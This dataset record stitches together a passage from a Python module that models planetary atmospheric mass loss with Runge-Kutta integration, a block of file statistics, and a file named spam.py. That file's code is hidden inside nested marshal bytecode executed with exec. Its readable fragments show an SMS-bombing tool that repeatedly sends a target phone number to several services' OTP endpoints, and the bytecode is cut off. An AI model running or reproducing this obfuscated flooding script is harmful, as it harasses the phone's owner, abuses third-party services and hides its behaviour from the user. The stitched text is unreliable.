Lxuv0 = l_xuv_all(Lx0)
Fxuv0 = flux_at_planet(Lxuv0, planet_object.distance)
# initial planet parameters at t_start
f_env_0 = f_env = planet_object.fenv
R0 = R = planet_object.radius
M0 = M = planet_object.mass
rho0 = rho = plmoLoFo14.density_planet(M0, R0) # initial mean density
M_env0 = M_env = M0 - planet_object.core_mass # initial envelope mass
M_core = planet_object.core_mass
# specify beta0 and K0
if beta_on == "yes":
beta = beta0 = bk.beta_fct(M0, Fxuv0, R0)
elif beta_on == "no":
beta = beta0 = 1.
if K_on == "yes":
K = K0 = bk.K_fct(planet_object.distance, M0,
planet_object.mass_star, R0)
elif K_on == "no":
K = K0 = 1.
t_start = track_dict["t_start"]
t_max = t_final
step_size = initial_step_size
# create time array for integration (with user-specified step size)
number = math.ceil((t_max-t_start)/step_size)
times, step_size2 = np.linspace(t_start, t_max, number,
endpoint=True, retstep=True)
dt = step_size2
# here I make lists of all the values I would like to
# track & output in the end:
M_arr = []
M_arr.append(M0)
R_arr = []
R_arr.append(R0)
t_arr = []
t_arr.append(t_start)
Lx_arr = []
Lx_arr.append(Lx0)
# CRITERION when to stop the mass-loss
# the LofO14 planets have a FIXED core mass and thus core radius
# (bare rocky core)
R_core = planet_object.core_radius # stop when this radius is reached!
for i in range(0, len(times)-1):
#print(t_arr[i])
# this is just for me to return the Lx(t) evolution to check if
# it is correct (not required since the Lx(t)
# calculation is embedded in the mass_loss_rate_fancy function)
Lx_i = lx_evo(t=t_arr[i], track_dict=track_dict)
Mdot1 = mass_loss_rate_forward_LO14(times[i], epsilon,
K_on, beta_on, planet_object,
f_env, track_dict)
k1 = (dt * Myr_to_sec * Mdot1) / M_EARTH # mass lost in one timestep
# in earth masses
M_05k1 = M + 0.5 * k1
M_env_05k1 = M_05k1 - M_core
f_env_05k1 = (M_env_05k1 / M_05k1) * 100
Mdot2 = mass_loss_rate_forward_LO14(times[i]+0.5*dt, epsilon,
K_on, beta_on, planet_object,
f_env_05k1, track_dict)
k2 = (dt * Myr_to_sec * Mdot2) / M_EARTH
M_05k2 = M + 0.5 * k2
M_env_05k2 = M_05k2 - M_core
f_env_05k2 = (M_env_05k2 / M_05k2) * 100
Mdot3 = mass_loss_rate_forward_LO14(times[i]+0.5*dt, epsilon,
K_on, beta_on, planet_object,
f_env_05k2, track_dict)
k3 = (dt * Myr_to_sec * Mdot3) / M_EARTH
M_k3 = M + k3
M_env_k3 = M_k3 - M_core
f_env_k3 = (M_env_k3 / M_k3) * 100
Mdot4 = mass_loss_rate_forward_LO14(times[i]+dt, epsilon,
K_on, beta_on, planet_object,
f_env_k3, track_dict)
k4 = (dt * Myr_to_sec * Mdot4) / M_EARTH
M_lost = (k1 + 2*k2 + 2*k3 + k4)/6. # after time-step dt
# check if planet with new mass does still have some atmosphere
if ((M + M_lost) - M_core) > 0:
# then planet still has some atmosphere left -> continue
M = M + M_lost # new planet mass
M_env = M - M_core # new envelope mass
t = t_arr[i] + dt # t_i_plus_1 - update time value
f_env = (M_env/M)*100 # in %
# calculate new radius with new planet mass/envelope mass
# fraction & one time step later
R = plmoLoFo14.calculate_planet_radius(
M_core, f_env, t,
flux_at_planet_earth(
planet_object.Lbol,
planet_object.distance),
planet_object.metallicity)
t_arr.append(t)
M_arr.append(M)
R_arr.append(R)
Lx_arr.append(lx_evo(t=t, track_dict=track_dict))
else:
# all atmosphere is gone -> terminate
#print("Atmosphere has evaportated! Only bare rocky" \
# + "core left! STOP this madness!")
# if the stop criterium is reached, I add the core mass
# and core radius to the array at t_i+1
t_arr.append(t_arr[-1]+dt)
M_arr.append(M_core)
R_arr.append(R_core)
Lx_arr.append(lx_evo(t=t_arr[-1]+dt, track_dict=track_dict))
return np.array(t_arr), np.array(M_arr), \
np.array(R_arr), np.array(Lx_arr)
#print("Done!")
return np.array(t_arr), np.array(M_arr), \
np.array(R_arr), np.array(Lx_arr)
def mass_planet_RK4_forward_Ot20(epsilon, K_on, beta_on, planet_object,
initial_step_size, t_final, track_dict):
"""USED: 4th order Runge-Kutta as numerical integration method
Integrate from the current time (t_start (where planet has R0 and M0)
into the future taking into account photoevaporative mass loss.
Parameters:
-----------
epsilon (float): evaporation efficiency
K_on (str): set use of K parameter on or off ("on" or "off)
beta_on (str): set use of beta parameter on or off ("on" or "off)
planet_object: object of planet class which contains also stellar
parameters and info about stellar evo track
step_size (float): initial step_size, variable
t_final (float): final time of simulation
track_dict (dict): dictionary with Lx evolutionary track parameters
[NOTE: the implementation of a variable step size is somewhat preliminary.
The step size is adjusted (made smaller or bigger depending how fast or
slow the mass/radius changes) until the final time step greater than
t_final. This means that if the step size in the end is e.g. 10 Myr, and
the integration is at 4999 Myr, then last time entry will be 4999+10 ->
5009 Myr.]
Returns:
--------
t_arr (array): time array to trace mass and radius evolution
M_arr (array): mass array with mass evolution over time (mass decrease)
R_arr (array): radius array with radius evolution over time (from
thermal contraction and photoevaporative mass-loss)
Lx_arr (array): array to trace the X-ray luminosity (mainly for
consistency checks)
"""
M_EARTH = const.M_earth.cgs.value
Myr_to_sec = 1e6*365*86400
# initialize the starting values for Lxuv(t_start), mass, density, beta, K
Lx0 = lx_evo(t=track_dict["t_start"], track_dict=track_dict)
Lxuv0 = l_xuv_all(Lx0)
Fxuv0 = flux_at_planet(Lxuv0, planet_object.distance)
# "make" initial planet at t_start
R0 = R = planet_object.radius
M0 = M = planet_object.mass
rho0 = rho = plmoOt20.density_planet(M0, R0) # initial approx. density
# specify beta0 and K0
if beta_on == "yes":
beta = beta0 = bk.beta_fct(M0, Fxuv0, R0)
elif beta_on == "no":
beta = beta0 = 1.
if K_on == "yes":
K = K0 = bk.K_fct(planet_object.distance, M0,
planet_object.mass_star, R0)
elif K_on == "no":
K = K0 = 1.
M_arr = []
M_arr.append(M0)
R_arr = []
R_arr.append(R0)
t_arr = []
t0 = t = track_dict["t_start"]
t_arr.append(t0)
Lx_arr = []
Lx_arr.append(Lx0)
# CRITERION when to stop the mass-loss
# stop when this hardcoded radius is reached!
# (this is the minimum radius for which the volatile regime is valid)
R_core = 2.15
M_core = plmoOt20.calculate_mass_planet_Ot20(R_core)
dt = initial_step_size
# NOTE: minimum and maximum step size are HARDCODED for now (see further
# down in code for more details)
min_step_size, max_step_size = 1e-2, 10.
i = 1 # counter to track how many traced RK iterations have been performed
j = 1 # counter to track how many RK iterations have been attempted.
envelope_left = True # variable to flag a planet if envelope is gone
close_to_evaporation = False # variable to flag if planet is close to
# complete atmospheric removal
# make list with all step sizes, even those which resulted in too drastic
# radius changes -> then I can check if the code gets stuck in an infinite
# loop between make_bigger, make_smaller, make_bigger, etc..
step_size_list = []
while t <= t_final:
#print(i, j, " t= ", t, dt)
# This step (Lx(t) calculation) is just for me to trace Lx and check
# if it is correct. It is NOT required since the Lx(t) calculation is
# embedded in the mass_loss_rate_fancy function)
Lx_i = lx_evo(t=t, track_dict=track_dict)
# IMPORTANT points on the time step:
# When the initial time step is too large OR the planet mass becomes
# very close to the core mass (after several time steps), it can happen
# that one of the RK substeps leads to such a large mass lost that the
# new planet mass is smaller than the core mass.
# Distinguish between two cases:
# 1) initial time step is too large such that M_lost = nan after the
# first iteration (i.e. Rk substep mass < core mass)
# -> immediately switch to lowest possible step size and let code run
# from there (i.e. code will make step size bigger again if necessary)
# 2) at the end of planet evolution when the planet mass gets very
# close to the core mass, at some point the mass lost is larger than
# the renmaining atmosphere mass (either at the end of a coplete RK
# iteration, or this already happends in one of the RK substeps, in
# which case the mass lost after the complete RK step evaluates to nan
# and no new planet radius can be calculated). In both cases the planet
# is assumed to be fully evaporated at t_i + dt.
# add the current step size
step_size_list.append(dt)
# take the last 20 entries in step_size_array and check for
# constant back-and-forth between two step sizes
# e.g. [0.1, 1.0, 0.1, 1.0, ...]
# check if difference is the same, but values in array are not all
# the same; also need to check if every 2nd element is the same,
# same goes for 2(n+1)th
step_size_array = np.array(step_size_list)
step_size_difference = abs(np.diff(step_size_array[-20:]))
if (len(step_size_array) >= 20): # check only after a 20 iterations
if (np.all(step_size_difference == step_size_difference[0]) and
~np.all(step_size_array == step_size_array[0]) and
np.all(step_size_array[::2] == step_size_array[0]) and
np.all(step_size_array[1::2] == step_size_array[1])):
print("no convergence, set min. step size.")
# if no convergence, switch to minumum step size
dt = min_step_size
# else, all is good, continue with current step size
while (envelope_left == True):
# go through RK iterations as long as there is envelope left
# apply Runge Kutta 4th order to find next value of M_dot
# NOTE: the mass lost in one timestep is in Earth masses
Mdot1 = mass_loss_rate_forward_Ot20(t, epsilon,
K_on, beta_on,
planet_object, R,
track_dict)
k1 = (dt * Myr_to_sec * Mdot1) / M_EARTH
M_k1 = M + 0.5 * k1 # mass after 1st RK step
R_k1 = plmoOt20.calculate_radius_planet_Ot20(M_k1)
if (i == 1) and (j == 1) and (M_k1 < M_core):
# then I am still in the first RK iteration, and the initial
# step size was likely too large -> set step size to minumum
dt = min_step_size
j += 1
break
Mdot2 = mass_loss_rate_forward_Ot20(t+0.5*dt, epsilon,
K_on, beta_on,
planet_object, R_k1,
track_dict)
k2 = (dt * Myr_to_sec * Mdot2) / M_EARTH
M_05k2 = M + 0.5 * k2
R_05k2 = plmoOt20.calculate_radius_planet_Ot20(M_05k2)
if (i == 1) and (j == 1) and (M_05k2 < M_core):
dt = min_step_size
j += 1
break
Mdot3 = mass_loss_rate_forward_Ot20(t+0.5*dt, epsilon,
K_on, beta_on,
planet_object, R_05k2,
track_dict)
k3 = (dt * Myr_to_sec * Mdot3) / M_EARTH
M_05k3 = M + k3
R_05k3 = plmoOt20.calculate_radius_planet_Ot20(M_05k3)
if (i == 1) and (j == 1) and (M_05k3 < M_core):
dt = min_step_size
j += 1
break
Mdot4 = mass_loss_rate_forward_Ot20(t+dt, epsilon,
K_on, beta_on,
planet_object, R_05k3,
track_dict)
k4 = (dt * Myr_to_sec * Mdot4) / M_EARTH
# total mass lost after time-step dt
M_lost = (k1 + 2*k2 + 2*k3 + k4) / 6.
# update next value of the planet mass
M_new = M + M_lost
# now it is time to check if atmosphere is gone or
# if planet is close to complete atmosphere removal
if ((np.isnan(M_lost) == True) \
or (np.iscomplex(M_new) == True)) \
and (dt == min_step_size):
# if M_lost = nan (i.e. planet evaporates in one of the RK
# steps) OR the four RK steps finish and the new planet mass is
# smaller or equal to the core mass, then the planet counts as
# evaporated!
# if this condition is satisfied and the step size is already
# at a minimum, then we assume the current RK iteration would
# remove all atmosphere and only the rocky core is left at
# t_i+dt; this terminates the code and returns the final planet
# properties
#print("Atmosphere has evaportated! Only bare rocky core left!"\
# + " STOP this madness!")
# since the the stop criterium is reached, we assume at t_i+1
# the planet only consists of the bare rocky core with the
# planet mass equal to the core mass and the planet radius
# equal to the core radius
t_arr.append(t_arr[-1]+dt)
M_arr.append(M_core)
R_arr.append(R_core)
Lx_arr.append(lx_evo(t=t_arr[-1]+dt, track_dict=track_dict))
envelope_left = False # set flag for complete env. removal
j += 1
break
elif ((np.isnan(M_lost) == True) \
or (np.iscomplex(M_new) == True)) \
and (dt > min_step_size) \
and (close_to_evaporation == False):
#print("close to evaporation")
# planet close to evaporation, but since the step size is not
# minimum yet, we set it to its minimum value and run the RK
# iteration again (until above stopping condition is fulfilled)
dt = min_step_size
close_to_evaporation = True
# this variable is for making sure the code does not run into
# an infinite loop when the planet is close to evaporation.
# Once this condition is set to True, the code continues with
# a fixed min. step size and is no longer allowed to adjust it.
j += 1
break
# this part is new compared to the one used in the PAPER (there we
# used a fixed step size!)
# if you're still in the while loop at this point, then calculate
# new radius and check how drastic the radius change would be;
# adjust the step size if too drastic or too little
R_new = plmoOt20.calculate_radius_planet_Ot20(M_new)
#print("R_new, f_new: ", R_new, f_env_new)
#print(abs((R-R_new)/R)*100)
# only adjust step size if planet is not close to complete evaporat.
if (close_to_evaporation == False):
#print("radius check")
# then do the check on how much the radius changes
# R(t_i) compared to R(t_i+dt);
# if radius change is larger than 0.5%, make step size smaller
# by factor 10 OR if radius change is smaller than 0.02%, make
# step size bigger by factor 10, but not bigger or smaller than
# max. or min. step size!
# if radius change too much/little, do not write anything to
# file, instead do RK iteration again with new step size
R_change = abs((R-R_new)/R)*100 # radius change compared to
# previous radius - in percent
if (R_change > 1.) \
and (t < track_dict["t_curr"]) \
and (dt > min_step_size):
dt = dt / 10.
j += 1
break
#elif ((R_change < 1.) \
# and (R_change >=0.1)) \
# and (t < track_dict["t_curr"]) \
# and (dt > min_step_size):
# dt = dt / 10.
# break
elif (R_change < (0.01)) \
and (t < track_dict["t_curr"]) \
and (dt < max_step_size):
dt = dt * 10.
j += 1
break
# NOTE: in principle I can adjust the code such that these
# hardcoded parameters are different for early planet evolution
# where much more is happening typically, and late planet
# evolution where almost no change is occurring anymore
elif (R_change > 1.) \
and (t >= track_dict["t_curr"]) \
and (dt > min_step_size):
dt = dt / 10.
j += 1
break
elif (R_change < (0.01)) \
and (t >= track_dict["t_curr"]) \
and (dt < max_step_size):
dt = dt * 10
j += 1
break
else: # if radius change is ok
# do sanity check: is new planet mass is still greater than
# the core mass? ->then there is still some atmosphere left
# in this case update params and go into next RK iteration
if ((M + M_lost) - M_core) > 0:
M = M + M_lost # new planet mass (M_lost is negative)
t = t_arr[-1] + dt # updated time value t_i_plus_1
M_arr.append(M)
t_arr.append(t)
Lx_arr.append(lx_evo(t=t, track_dict=track_dict))
# calculate new envelope mass fraction:
M_env = M - M_core
f_env = (M_env/M)*100 # in %
# calculate new radius with new planet mass
# one time step later
R = plmoOt20.calculate_radius_planet_Ot20(M)
R_arr.append(R)
i += 1 # update step to i+1
j += 1
else:
# this should never happen
sys.exit('sth went wrong of you see this!')
break
elif (close_to_evaporation == True):
# if this condition is true, do not adjust step size
# based on the radius change
if ((M + M_lost) - M_core) > 0:
M = M + M_lost # new planet mass (M_lost is negative)
t = t_arr[-1] + dt # updated time value t_i_plus_1
M_arr.append(M)
t_arr.append(t)
Lx_arr.append(lx_evo(t=t, track_dict=track_dict))
# calculate new envelope mass fraction:
M_env = M - M_core
f_env = (M_env/M)*100 # in %
# calculate new radius with new planet mass
# one time step later
R = plmoOt20.calculate_radius_planet_Ot20(M)
R_arr.append(R)
i += 1 # update step to i+1
j += 1
else:
sys.exit('sth went wrong of you see this!')
break
if (envelope_left == False):
# planet has evaporated, so return last planet params for bare core
return np.array(t_arr), np.array(M_arr), \
np.array(R_arr), np.array(Lx_arr)
#print("Done!")
return np.array(t_arr), np.array(M_arr), \
np.array(R_arr), np.array(Lx_arr)
def mass_planet_RK4_forward_Ot20_PAPER(epsilon, K_on, beta_on,
planet_object, initial_step_size,
t_final, track_dict):
"""USED: 4th order Runge-Kutta as numerical integration method
Integrate from the current time (t_start (where planet has R0 and M0)
into the future taking into account photoevaporative mass loss.
Input:
----------
epsilon: evaporation efficiency
K_on: set use of K parameter on or off
beta_on: set use of beta parameter on or off
planet_object: object of planet class which contains also stellar
parameters and info about stellar evo track
step_size: initial step_size, fixed
t_final: final time of simulation
track_dict: dictionary with Lx evolutionary track parameters
Output:
----------
t_arr, M_arr, R_arr, Lx_arr: array of time, mass, radius and
Lx values from t_start to t_final
"""
M_EARTH = const.M_earth.cgs.value
Myr_to_sec = 1e6*365*86400
# initialize the starting values for Lxuv(t_start), mass, density, beta, K
Lx0 = lx_evo(t=track_dict["t_start"], track_dict=track_dict)
Lxuv0 = l_xuv_all(Lx0)
Fxuv0 = flux_at_planet(Lxuv0, planet_object.distance)
# "make" initial planet at t_start
R0 = R = planet_object.radius
M0 = M = planet_object.mass
rho0 = rho = plmoOt20.density_planet(M0, R0) # initial approx. density
# specify beta0 and K0
if beta_on == "yes":
beta = beta0 = bk.beta_fct(M0, Fxuv0, R0)
elif beta_on == "no":
beta = beta0 = 1.
if K_on == "yes":
K = K0 = bk.K_fct(planet_object.distance, M0,
planet_object.mass_star, R0)
elif K_on == "no":
K = K0 = 1.
# create time array for integration (with user-specified step size)
t_start, t_max = track_dict["t_start"], t_final
step_size = initial_step_size
number = math.ceil((t_max-t_start)/step_size)
times, step_size2 = np.linspace(t_start, t_max, number,
endpoint=True, retstep=True)
dt = step_size2
# make lists of all the values wwe want to track & output in the end:
M_arr = []
M_arr.append(M0)
R_arr = []
R_arr.append(R0)
t_arr = []
t_arr.append(t_start)
Lx_arr = []
Lx_arr.append(Lx0)
# CRITERION when to stop the mass-loss
R_core = 2.15 # stop when this radius is reached! (this is the minimum
# radius for which the volatile regime is valid)
M_core = plmoOt20.calculate_mass_planet_Ot20(R_core)
for i in range(0, len(times)-1):
# this is just for me to return the Lx(t) evolution to check if it is
# correct (not required since the Lx(t) calculation is embedded in
# the mass_loss_rate_fancy function)
Lx_i = lx_evo(t=t_arr[i], track_dict=track_dict)
Mdot1 = mass_loss_rate_forward_Ot20(times[i], epsilon,
K_on, beta_on,
planet_object, R,
track_dict)
k1 = (dt * Myr_to_sec * Mdot1) / M_EARTH # in earth masses
M_05k1 = M + 0.5 * k1
R_05k1 = plmoOt20.calculate_radius_planet_Ot20(M_05k1)
Mdot2 = mass_loss_rate_forward_Ot20(times[i]+0.5*dt, epsilon,
K_on, beta_on,
planet_object, R_05k1,
track_dict)
k2 = (dt * Myr_to_sec * Mdot2) / M_EARTH
M_05k2 = M + 0.5 * k2
R_05k2 = plmoOt20.calculate_radius_planet_Ot20(M_05k2)
Mdot3 = mass_loss_rate_forward_Ot20(times[i]+0.5*dt, epsilon,
K_on, beta_on,
planet_object, R_05k2,
track_dict)
k3 = (dt * Myr_to_sec * Mdot3) / M_EARTH
M_05k3 = M + 0.5 * k3
R_05k3 = plmoOt20.calculate_radius_planet_Ot20(M_05k3)
Mdot4 = mass_loss_rate_forward_Ot20(times[i]+dt, epsilon,
K_on, beta_on,
planet_object, R_05k3,
track_dict)
k4 = (dt * Myr_to_sec * Mdot4) / M_EARTH
M_lost = (k1 + 2*k2 + 2*k3 + k4)/6. # mass lost after time-step dt
# check if planet with new mass does still have some atmosphere
if ((M + M_lost) - M_core) > 0:
# then planet still has some atmosphere left -> continue
M = M + M_lost # new planet mass (M_lost is negative)
# t_i_plus_1 - update time value
t = t_arr[-1] + dt
# calculate new radius with new planet mass
R = plmoOt20.calculate_radius_planet_Ot20(M)
M_arr.append(M)
R_arr.append(R)
t_arr.append(t)
Lx_arr.append(lx_evo(t=t, track_dict=track_dict))
else:
# all atmosphere is gone (based on criterion set at the top)
#print("Atmosphere has evaportated! Only bare rocky core" \
# + "left! STOP this madness!")
# if the stop criterium is reached, I add the core mass
# and core radius to the array at t_i+1
t_arr.append(t_arr[-1]+dt)
M_arr.append(M_core)
R_arr.append(R_core)
Lx_arr.append(lx_evo(t=t_arr[-1]+dt, track_dict=track_dict))
return np.array(t_arr), np.array(M_arr), \
np.array(R_arr), np.array(Lx_arr)
# if planet survives, output the final arrays
#Lx_arr[i+1] = lx_evo(t=t_arr[-1]+dt, track_dict=track_dict)
#Lx_arr.append(lx_evo(t=t_arr[-1]+dt, track_dict=track_dict))
#print("Done!")
return np.array(t_arr), np.array(M_arr), \
np.array(R_arr), np.array(Lx_arr)
| 45.520226
| 80
| 0.548173
| 6,641
| 48,388
| 3.815239
| 0.073332
| 0.040731
| 0.012156
| 0.011051
| 0.956901
| 0.94885
| 0.934799
| 0.918814
| 0.910408
| 0.900028
| 0
| 0.029559
| 0.379144
| 48,388
| 1,062
| 81
| 45.563089
| 0.813827
| 0.414318
| 0
| 0.892532
| 0
| 0
| 0.01223
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007286
| false
| 0
| 0.020036
| 0
| 0.041894
| 0.003643
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
85a138309a7814fc3442b47f214687488c222bd7
| 21,082
|
py
|
Python
|
spam.py
|
4NK3R-PRODUCT1ON/SpamSmsV4
|
c16a66f52574665c24c6ff3b6f309b42f0d79b4c
|
[
"Apache-2.0"
] | 1
|
2021-03-08T15:06:46.000Z
|
2021-03-08T15:06:46.000Z
|
spam.py
|
4NK3R-PRODUCT1ON/SpamSmsV4
|
c16a66f52574665c24c6ff3b6f309b42f0d79b4c
|
[
"Apache-2.0"
] | null | null | null |
spam.py
|
4NK3R-PRODUCT1ON/SpamSmsV4
|
c16a66f52574665c24c6ff3b6f309b42f0d79b4c
|
[
"Apache-2.0"
] | null | null | null |
# Compile By Anker
# Youtube : FaaL TV
# Youtube : Anker Production
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsF)\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xbc(\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns2(\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xa8\'\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x1e\'\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x94&\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\n&\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x80%\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xf6$\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nsl$\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xe2#\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00@\x00\x00\x00s\xc8\x00\x00\x00d\x00d\x01l\x00Z\x01d\x00d\x01l\x02Z\x02d\x00d\x01l\x03Z\x03d\x00d\x01l\x04Z\x04d\x00d\x01l\x00Z\x00z\x0cd\x00d\x01l\x05Z\x05W\x00n\x16\x01\x00\x01\x00\x01\x00e\x03\xa0\x06d\x02\xa1\x01\x01\x00Y\x00n\x020\x00e\x01\xa0\x07\xa1\x00Z\x08e\x03\xa0\x06d\x03\xa1\x01\x01\x00e\x05\xa0\td\x04\xa1\x01Z\nd\x05Z\x0bd\x06Z\x0cd\x07Z\rd\x00Z\x0ed\x00Z\x0fG\x00d\x08d\t\x84\x00d\t\x83\x02Z\x10e\x11d\n\x83\x01\xa0\x06d\x03\xa1\x01\x01\x00d\x0bd\x0c\x84\x00Z\x12d\rd\x0e\x84\x00Z\x13d\x0fd\x10\x84\x00Z\x14e\x15d\x11k\x02r\xc4e\x14\x83\x00\x01\x00e\x13\x83\x00\x01\x00d\x01S\x00)\x12\xe9\x00\x00\x00\x00Nz\x14pip install pyfiglet\xda\x05clearz\x08Spam Smsz\x07\x1b[37;1mz\x07\x1b[32;1mz\x07\x1b[31;1mc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x1c\x00\x00\x00e\x00Z\x01d\x00Z\x02d\x01d\x02\x84\x00Z\x03d\x03d\x04\x84\x00Z\x04d\x05S\x00)\x06\xda\x06nyepamc\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\x1a\x00\x00\x00|\x01|\x02|\x03\x03\x00\x02\x00|\x00_\x00|\x00_\x01|\x00_\x02d\x00S\x00)\x01N)\x03\xda\x02_8\xda\x03_08\xda\x03_62)\x04\xda\x04selfr\x04\x00\x00\x00r\x05\x00\x00\x00r\x06\x00\x00\x00\xa9\x00r\x08\x00\x00\x00\xfa\n<kingtebe>\xda\x08__init__\x11\x00\x00\x00s\x02\x00\x00\x00\x00\x01z\x0fnyepam.__init__c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x19\x00\x00\x00C\x00\x00\x00s\xe4\x05\x00\x00\x90\x05ztt\x00|\x01\x83\x01D\x00]4}\x02t\x01j\x02d\x01d\x02|\x00j\x03i\x01d\x03d\x04d\x05\x9c\x02d\x06\x8d\x03j\x04}\x03d\x07|\x03v\x00r<\x01\x00qBq\x0c\x01\x00qBq\x0ct\x00|\x01\x83\x01D\x00]d}\x02t\x01j\x02d\x08t\x05\xa0\x06d\td\n|\x00j\x07\x17\x00d\x0b\x9c\x02\xa1\x01d\x0cd\rd\x0ed\x0fd\x10d\x11d\x12d\x13d\x14d\x11d\x15d\x16d\x17d\x18d\x11d\x19d\x1ad\x1bd\x1cd\x1dd\x1e\x9c\x14d\x06\x8d\x03j\x04}\x03d\x1f|\x03v\x00r\xaa\x01\x00q\xb0qJ\x01\x00q\xb0qJt\x00|\x01\x83\x01D\x00]2}\x02t\x05\xa0\x08t\t\xa0\nd |\x00j\x07\x9b\x00\x9d\x02\xa1\x01j\x04\xa1\x01}\x03|\x03d!\x19\x00d"k\x02r\xe6q\xb8q\xb8\x01\x00q\xecq\xb8t\x00|\x01\x83\x01D\x00]H}\x02t\x01j\x02d#d\x02|\x00j\x03i\x01d$d\x03d%d&d\'d(d\x04d)d*d+d,d-\x9c\x0bd\x06\x8d\x03j\x04}\x03d.|\x03v\x00\x90\x01r6q\xf4q\xf4\x01\x00\x90\x01q>q\xf4t\x00|\x01\x83\x01D\x00]Z}\x02t\x01j\x02d/t\x05\xa0\x06|\x00j\x07d0d1d2d3d4d5\x9c\x06\xa1\x01d6d7d8d9d:d;d&d7d<d=d>\x9c\nd\x06\x8d\x03j\x04}\x03d?|\x03v\x00\x90\x01r\x98\x90\x01qFn\x06\x01\x00\x90\x01q\xa2\x90\x01qFt\x00|\x01\x83\x01D\x00]B}\x02t\x01j\x02d@d\ndA|\x00j\x03d\x11d\x11dBdC\x9c\x06dDdEi\x01d\x06\x8d\x03j\x04}\x03dF|\x03v\x00\x90\x01r\xe4\x90\x01q\xaan\x06\x01\x00\x90\x01q\xee\x90\x01q\xaat\x00|\x01\x83\x01D\x00]L}\x02t\x01j\x02dGt\x05\xa0\x06dHdI|\x00j\x0bd8dJ\x9c\x04\xa1\x01d&dKdLd\x04d;dM\x9c\x05d\x06\x8d\x03j\x04}\x03dN|\x03v\x00\x90\x02r:\x90\x01q\xf6n\x06\x01\x00\x90\x02qD\x90\x01q\xf6t\x00|\x01\x83\x01D\x00]B}\x02t\x01j\x02dOt\x05\xa0\x06|\x00j\x0bdPdQ\x9c\x02\xa1\x01d;d\x04dR\x9c\x02d\x06\x8d\x03j\x04}\x03d\x11|\x03v\x00\x90\x02r\x86\x90\x02qLn\x06\x01\x00\x90\x02q\x90\x90\x02qL